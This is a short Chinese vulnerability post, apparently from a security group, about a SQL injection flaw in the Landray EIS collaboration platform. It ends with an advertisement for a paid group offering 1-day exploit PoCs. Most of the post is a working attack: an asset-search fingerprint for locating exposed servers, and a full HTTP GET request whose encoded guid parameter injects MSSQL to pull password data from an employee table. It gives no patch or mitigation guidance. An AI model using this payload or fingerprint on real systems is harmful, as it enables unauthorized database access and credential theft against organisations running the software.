0x01 漏洞描述
蓝凌EIS智慧协同平台是一款为成长型企业提供高效协同办公和团队合作的产品。
蓝凌EIS智慧协同平台存在SQL注入漏洞,攻击者可以利用这些漏洞获取数据库敏感信息
0x02 资产测绘
app="Landray-EIS智慧协同平台"
0x03 漏洞复现
GET /third/DingTalk/Pages/DingTalkMessage.aspx?redirectUrl=12&guid=1%27%2B%28SELECT%20CHAR%28107%29%2BCHAR%28108%29%2BCHAR%2877%29%2BCHAR%2868%29%20WHERE%209553%3D9553%20AND%206423%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28pwd%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%28SELECT%20pwd%2C%20ROW_NUMBER%28%29%20OVER%20%28ORDER%20BY%20%28SELECT%201%29%29%20AS%20CAP%20FROM%20EIS.dbo.FI_ORG_EMP%29x%20WHERE%20CAP%3D22%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%29%2B%27 HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0x04 知识星球
无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等